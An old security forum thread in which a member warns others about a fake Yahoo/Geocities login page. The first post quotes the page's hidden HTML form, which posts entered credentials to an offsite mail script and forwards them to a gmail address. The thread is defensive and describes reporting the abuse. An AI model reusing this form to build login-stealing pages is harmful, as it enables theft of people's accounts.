Interesting new phish attempt
Results 1 to 3 of 3

Thread: Interesting new phish attempt

  1. #1
    Senior Member
    Join Date
    Mar 2003
    Posts
    372

    Interesting new phish attempt

    So one of my more observent users sent me this link today.

    (click only at your own risk as I don't know what else they are doing on this page at the moment) http://www.geocities.com/ooopsss_104/

    he noticed that he had fat fingered his Yahoo account information in the username/password fields but it seemed to accept his information anyway. So I checked it out and I found the following buried in the HTML code.


    Code:
    <FORM METHOD="POST" ACTION="http://www2.fiberbit.net/form/mailto.cgi" ENCTYPE="x-www-form-urlencoded">
    	<INPUT TYPE="hidden" NAME="Mail_From" VALUE="Yahoo">
        <INPUT TYPE="hidden" NAME="Mail_To" VALUE="takinurname@gmail.com">
        <INPUT TYPE="hidden" NAME="Mail_Subject" VALUE="Yahoo id">
        <INPUT TYPE="hidden" NAME="Next_Page" VALUE="http://www.geocities.com/got_milf.does_you_good/index.html">
    So someone has created a legit looking Geocities/Yahoo site, put a legit looking login screen on that site but has modified the script to send login information to an offsite gmail account and offloads that email process to another website based out of Queensland Australia.

    This is bothersome since it looks completely legit, is on a legit website, and sends you to a legit looking error page.

    You can "login" with fake credentials and it will still accept it, showing that they are not passing your credentials on to Yahoo to verify that they are real. That will be the next step in this scam I'm sure.

    Just thought people would want to know. This site has been reported to Geocities/Yahoo already but it wouldn't hurt if a couple of others reported them also.

    I have also sent an abuse message to Gmail explaining that they are being used in this scam also.

    Give a man a match and he will be warm for a while, light him on fire and he will be warm for the rest of his life.

  2. #2
    Member
    Join Date
    Apr 2002
    Posts
    51

    Talking roofles

    No, this isnt a new idea, people have been faking login pages since the early days of the www. May want to report the page to geocities though...

  3. #3
    Senior Member
    Join Date
    Mar 2003
    Posts
    372
    now I /know/ they have been faking pages for a long time... I just haven't seen one faked ON the website they were faking.

    These people are faking Geocities on Geocities. I have seen plenty of misdirects for other sites like Paypal... this is just a first for me.

    Give a man a match and he will be warm for a while, light him on fire and he will be warm for the rest of his life.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  

 Security News

     Patches

       Security Trends

         How-To

           Buying Guides